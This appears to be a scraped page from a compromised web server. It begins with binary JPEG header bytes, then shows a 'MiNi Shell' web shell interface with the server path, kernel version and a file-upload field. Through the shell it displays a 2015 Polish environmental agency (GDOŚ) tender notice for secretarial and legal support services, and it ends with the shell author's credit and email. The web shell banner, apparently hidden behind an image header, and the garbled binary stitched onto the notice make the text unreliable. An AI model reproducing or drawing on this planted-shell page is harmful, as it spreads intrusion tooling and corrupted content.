JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150219/37844-N-2015.html

<p class="kh_header"><b>Warszawa: Świadczenie usług wsparcia administracyjnego i merytorycznego w ramach projektu /Wsparcie na działania sieci organów środowiskowych i instytucji zarządzających funduszami unijnymi /Partnerstwo: Środowisko dla Rozwoju/ w 2014 r./ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego i realizowanego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 - Nr referencyjny: 2/GDOŚ/2015</b><br>
<b>Numer ogłoszenia: 37844 - 2015; data zamieszczenia: 19.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Ochrony Środowiska , ul. Wawelska 52/54, 00-922 Warszawa, woj. mazowieckie, tel. 22 5792107, faks 22 5792112.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług wsparcia administracyjnego i merytorycznego w ramach projektu /Wsparcie na działania sieci organów środowiskowych i instytucji zarządzających funduszami unijnymi /Partnerstwo: Środowisko dla Rozwoju/ w 2014 r./ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego i realizowanego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 - Nr referencyjny: 2/GDOŚ/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach projektu /Wsparcie na działania sieci organów środowiskowych i instytucji zarządzających funduszami unijnymi /Partnerstwo: Środowisko dla Rozwoju/ w 2014 r. (zwanego dalej: /projektem/). Przedmiot zamówienia podzielony został na trzy oddzielne części:
1) Część I - świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze asystenckiej zespołu projektowego. W ramach tej części, Wykonawca będzie zobowiązany w szczególności do:
a) wsparcia zespołu projektowego w prowadzeniu działań informacyjno-promocyjnych podejmowanych w ramach projektu m.in. akcje mailingowe, monitorowanie odwiedzin stron, dbanie o szatę graficzną zgodną z wytycznymi projektu, rozwój funkcjonalności strony,
b) pomocy w przygotowaniu i opracowaniu materiałów do broszur/netletterów dystrybuowanych w ramach Sieci;
c) przygotowywania informacji na strony internetowe poświęconych bieżącym działaniom podejmowanym w ramach Sieci;
d) przygotowywania i aktualizowania informacji o wydarzeniach podejmowanych w ramach działalności Sieci, w tym przygotowywania m.in. zbiorczych zestawień o działaniach podejmowanych w poszczególnych grupach roboczych;
e) wsparcia w organizacji, koordynowaniu i dokumentowaniu spotkań roboczych - stacjonarnych i wyjazdowych, w tym m.in. prowadzeniu kalendarium spotkań grup roboczych, galerii oraz sporządzania i opracowywania protokołów ze spotkań;
f) udziału w procesie monitoringu i kontroli jakości spotkań realizowanych w ramach projektu;
g) redagowania i aktualizacji informacji na temat prac podejmowanych w ramach Sieci przy współpracy z przewodniczącymi poszczególnych grup roboczych.
W ramach tej części, Zamawiający przewiduje realizację przedmiotu zamówienia w liczbie maksymalnie 450 roboczogodzin;
2) Część II - świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze sekretarskiej. W ramach tej części, Wykonawca będzie zobowiązany w szczególności do:
a) bieżącej obsługi korespondencji przychodzącej i wychodzącej do Sekretariatu Sieci, tj. przyjmowania, wysyłania i rejestrowania korespondencji oraz nadzorowania jej obiegu,
b) przekazywania korespondencji pomiędzy siedzibą Generalnej Dyrekcji Ochrony Środowiska przy ul. Wawelskiej 52/54 w Warszawie a miejscem pracy Wydziału do spraw Projektów i Krajowej Sieci /Partnerstwo: Środowisko dla Rozwoju/ przy ul. Stawki 2 w Warszawie,
c) gromadzenia i przedkładania dokumentów oraz korespondencji do podpisu właściwych osób, zgodnie z kompetencjami,
d) redagowania krótkich pism oraz tworzenia m.in. notatek, sprawozdań, protokołów i innych materiałów powstających w ramach realizacji projektu.
W ramach tej części, Zamawiający przewiduje realizację przedmiotu zamówienia w liczbie maksymalnie 750 roboczogodzin;
3) Część III - świadczenie usług wsparcia prawnego Sekretariatu Sieci: /Partnerstwo: Środowisko dla Rozwoju/. W ramach tej części, Wykonawca będzie zobowiązany do realizacji wszelkich kwestii prawnych powstałych w trakcie realizacji projektu, w szczególności:
a) weryfikacji pod względem formalnoprawnym pism będących w kompetencji Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ funkcjonującego w ramach Wydziału do spraw Projektów i Krajowej Sieci /Partnerstwo: Środowisko dla Rozwoju/,
b) sporządzania i weryfikacji pod względem formalnoprawnym aktów prawnych o charakterze wewnętrznym,
c) sporządzania, opiniowania i weryfikacji pod względem formalnoprawnym projektów umów cywilnoprawnych oraz porozumień zawieranych na potrzeby działań realizowanych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
d) weryfikacji i opiniowania pod względem formalnoprawnym dokumentacji (ze szczególnym uwzględnieniem opisów przedmiotów zamówienia oraz projektów umów cywilnoprawnych) niezbędnej do wszczęcia postępowania zgodnie z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, z późn. zm.) oraz dokumentacji niezbędnej do wszczęcia postępowań wyłączonych spod stosowania przepisów ustawy - Prawo zamówień publicznych, 
e) wyszukiwania i analizy orzecznictwa na potrzeby działań prowadzonych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
f) doradztwa prawnego w bieżących czynnościach podejmowanych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
g) udzielania porad prawnych w celu rozstrzygnięcia kwestii wątpliwych w świetle interpretacji i stosowania przepisów prawa,
h) udziału w spotkaniach realizowanych w ramach projektu, według potrzeb Zamawiającego,
i) analizy prawnej i opiniowania możliwości wprowadzania zmian do zawartych przez Zamawiającego umów w ramach Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/.
W ramach tej części, Zamawiający przewiduje realizację przedmiotu zamówienia w liczbie maksymalnie 750 roboczogodzin.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 75.10.00.00-7, 75.90.00.00-9, 79.10.00.00-5, 79.11.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będzie dysponował na etapie realizacji zamówienia osobami zdolnymi do wykonania zamówienia, w tym co najmniej 1 (jedną) osobą posiadającą łącznie:
dla Części I:
1) wykształcenie wyższe z obszaru nauk przyrodniczych;
2) co najmniej 2-letnie doświadczenie związane z realizacją projektów z zakresu ochrony środowiska, potwierdzone udziałem w co najmniej jednym projekcie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, w ramach którego:
a) przygotowywała i opracowywała materiały promocyjne na potrzeby projektu,
b) współorganizowała spotkania, nadzorowała zadania logistyczno-organizacyjne,
c) brała udział w realizacji zawartych umów na potrzeby realizacji zadań pod kątem kontroli i terminowości ich realizacji,
3) co najmniej roczne doświadczenie polegające na prowadzeniu serwisu internetowego i w zarządzaniu treścią w oparciu o system zarządzania treścią (CMS) w ciągu ostatnich 5 lat przed upływem terminu składania ofert,
4) znajomość środowiska Windows oraz pakietu MS Office (Word, Excel, Power Point);
dla Części II:
5) wykształcenie wyższe;
6) co najmniej roczne doświadczenie polegające na prowadzeniu i obsłudze sekretariatu w ciągu ostatnich 5 lat przed upływem terminu składania ofert, w ramach której:
a) obsługiwał korespondencję przychodzącą i wychodzącą, tj. przyjmował, wysyłał i rejestrował korespondencję oraz nadzorował jej obieg,
b) gromadził i przedkładał dokumenty oraz korespondencję do podpisu właściwych osób, zgodnie z kompetencjami,
c) redagował krótkie pisma oraz tworzył m.in. notatki;
dla Części III:
6) wykształcenie wyższe magisterskie prawnicze,
7) co najmniej roczne doświadczenie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, polegających na opiniowaniu i weryfikowaniu pod względem formalnoprawnym projektów umów cywilnoprawnych oraz umów zawieranych w ramach postępowań prowadzonych zgodnie z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, z późn. zm.),
8) posiada doświadczenie w stosowaniu prawa w zakresie ochrony środowiska,
9) posiada bardzo dobrą znajomość środowiska Windows oraz pakietu MS Office,
10) posiada znajomość aktualnej linii orzeczniczej w zakresie przepisów ustawy Pzp oraz umiejętność ich stosowania w praktyce.
Uwaga: Zamawiający dopuszcza możliwość wykazania się wymaganym doświadczeniem udziału w ramach jednej lub kilku usługach, które łącznie spełniają warunki postawione przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - test wiedzy - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gdos.gov.pl/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GENERALNA DYREKCJA OCHRONY ŚRODOWISKA
00-922 Warszawa, ul. Wawelska 52/54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2015 godzina 11:00, miejsce: GENERALNA DYREKCJA OCHRONY ŚRODOWISKA
00-922 Warszawa, ul. Wawelska 52/54
IV piętro, pok. 486.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia jest finansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego i realizowanego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 - nr porozumienia: POPT.03.01.00-00-375/13.
2. Termin wykonania zamówienia: 
1) dla Części I - od dnia zawarcia umowy, ale nie wcześniej niż od 01 kwietnia 2015 r. do 30 czerwca 2015 r.;
2) dla Części II i III - od dnia zawarcia umowy do 30 czerwca 2015 r.
lub do wyczerpania ilości roboczogodzin dla każdej z części.
3. Zamawiający żąda, by w przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu:
1) pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
2) dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ na zasadach określonych w art. 38 ustawy Pzp, w takiej sytuacji Zamawiający dopuszcza formę pisemną lub za pomocą faksu na numer +4822 579 21 12 lub drogą elektroniczną na adres: zampub@gdos.gov.pl.
5. Wyjaśnienia treści SIWZ oraz wszelkie informacje dotyczące przedmiotowego postępowania zamieszczane będą na stronie internetowej Zamawiającego www.gdos.gov.pl w zakładce: http://bip.gdos.gov.pl/zamowienia-publiczne.
6. Test wiedzy składa się z 25 pytań, na każde pytanie jest tylko jedna prawidłowa odpowiedź. Czas trwania wyniesie maksymalnie 30 minut. Wykonawca może uzyskać maksymalnie 50 punktów. Za każdą prawidłową odpowiedź wykonawca otrzyma 2 punkty, za brak odpowiedzi lub za odpowiedź nieprawidłową - 0 punktów.
Test wiedzy zostanie przeprowadzony po weryfikacji formalnej ofert i ewentualnych uzupełnieniach i wyjaśnieniach, w siedzibie Generalnej Dyrekcji Ochrony Środowiska w Warszawie. O dokładnym terminie testów wiedzy Zamawiający poinformuje Wykonawców co najmniej 3 dni przed terminem przeprowadzenia tych testów. Przed rozpoczęciem testu wiedzy osoby wskazane przez Wykonawców w Załączniku nr 5a, 5b lub 5c do SIWZ - wykaz osób, zobowiązane będą do okazania dokumentu potwierdzającego tożsamość tej osoby.
7. Liczba punktów za kryterium /test wiedzy/ dla każdego Wykonawcy wynikała będzie z iloczynu prawidłowych odpowiedzi i liczby punków za prawidłową odpowiedź.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze asystenckiej zespołu projektowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze asystenckiej zespołu projektowego. W ramach tej części, Wykonawca będzie zobowiązany w szczególności do:
a) wsparcia zespołu projektowego w prowadzeniu działań informacyjno-promocyjnych podejmowanych w ramach projektu m.in. akcje mailingowe, monitorowanie odwiedzin stron, dbanie o szatę graficzną zgodną z wytycznymi projektu, rozwój funkcjonalności strony,
b) pomocy w przygotowaniu i opracowaniu materiałów do broszur/netletterów dystrybuowanych w ramach Sieci;
c) przygotowywania informacji na strony internetowe poświęconych bieżącym działaniom podejmowanym w ramach Sieci;
d) przygotowywania i aktualizowania informacji o wydarzeniach podejmowanych w ramach działalności Sieci, w tym przygotowywania m.in. zbiorczych zestawień o działaniach podejmowanych w poszczególnych grupach roboczych;
e) wsparcia w organizacji, koordynowaniu i dokumentowaniu spotkań roboczych - stacjonarnych i wyjazdowych, w tym m.in. prowadzeniu kalendarium spotkań grup roboczych, galerii oraz sporządzania i opracowywania protokołów ze spotkań;
f) udziału w procesie monitoringu i kontroli jakości spotkań realizowanych w ramach projektu;
g) redagowania i aktualizacji informacji na temat prac podejmowanych w ramach Sieci przy współpracy z przewodniczącymi poszczególnych grup roboczych.
W ramach tej części, Zamawiający przewiduje realizację przedmiotu zamówienia w liczbie maksymalnie 450 roboczogodzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 75.10.00.00-7, 75.90.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. test wiedzy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze sekretarskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - świadczenie usług wsparcia w prowadzeniu Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ w zakresie prac zleconych w obsłudze sekretarskiej. W ramach tej części, Wykonawca będzie zobowiązany w szczególności do:
a) bieżącej obsługi korespondencji przychodzącej i wychodzącej do Sekretariatu Sieci, tj. przyjmowania, wysyłania i rejestrowania korespondencji oraz nadzorowania jej obiegu,
b) przekazywania korespondencji pomiędzy siedzibą Generalnej Dyrekcji Ochrony Środowiska przy ul. Wawelskiej 52/54 w Warszawie a miejscem pracy Wydziału do spraw Projektów i Krajowej Sieci /Partnerstwo: Środowisko dla Rozwoju/ przy ul. Stawki 2 w Warszawie,
c) gromadzenia i przedkładania dokumentów oraz korespondencji do podpisu właściwych osób, zgodnie z kompetencjami,
d) redagowania krótkich pism oraz tworzenia m.in. notatek, sprawozdań, protokołów i innych materiałów powstających w ramach realizacji projektu.
W ramach tej części, Zamawiający przewiduje realizację przedmiotu zamówienia w liczbie maksymalnie 750 roboczogodzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.50.00.00-9, 75.11.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. test wiedzy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie usług wsparcia prawnego Sekretariatu Sieci: /Partnerstwo: Środowisko dla Rozwoju/.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - świadczenie usług wsparcia prawnego Sekretariatu Sieci: /Partnerstwo: Środowisko dla Rozwoju/. W ramach tej części, Wykonawca będzie zobowiązany do realizacji wszelkich kwestii prawnych powstałych w trakcie realizacji projektu, w szczególności:
a) weryfikacji pod względem formalnoprawnym pism będących w kompetencji Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/ funkcjonującego w ramach Wydziału do spraw Projektów i Krajowej Sieci /Partnerstwo: Środowisko dla Rozwoju/,
b) sporządzania i weryfikacji pod względem formalnoprawnym aktów prawnych o charakterze wewnętrznym,
c) sporządzania, opiniowania i weryfikacji pod względem formalnoprawnym projektów umów cywilnoprawnych oraz porozumień zawieranych na potrzeby działań realizowanych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
d) weryfikacji i opiniowania pod względem formalnoprawnym dokumentacji (ze szczególnym uwzględnieniem opisów przedmiotów zamówienia oraz projektów umów cywilnoprawnych) niezbędnej do wszczęcia postępowania zgodnie z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, z późn. zm.) oraz dokumentacji niezbędnej do wszczęcia postępowań wyłączonych spod stosowania przepisów ustawy - Prawo zamówień publicznych, 
e) wyszukiwania i analizy orzecznictwa na potrzeby działań prowadzonych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
f) doradztwa prawnego w bieżących czynnościach podejmowanych przez Sekretariat Sieci /Partnerstwo: Środowisko dla Rozwoju/,
g) udzielania porad prawnych w celu rozstrzygnięcia kwestii wątpliwych w świetle interpretacji i stosowania przepisów prawa,
h) udziału w spotkaniach realizowanych w ramach projektu, według potrzeb Zamawiającego,
i) analizy prawnej i opiniowania możliwości wprowadzania zmian do zawartych przez Zamawiającego umów w ramach Sekretariatu Sieci /Partnerstwo: Środowisko dla Rozwoju/.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.10.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. test wiedzy - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com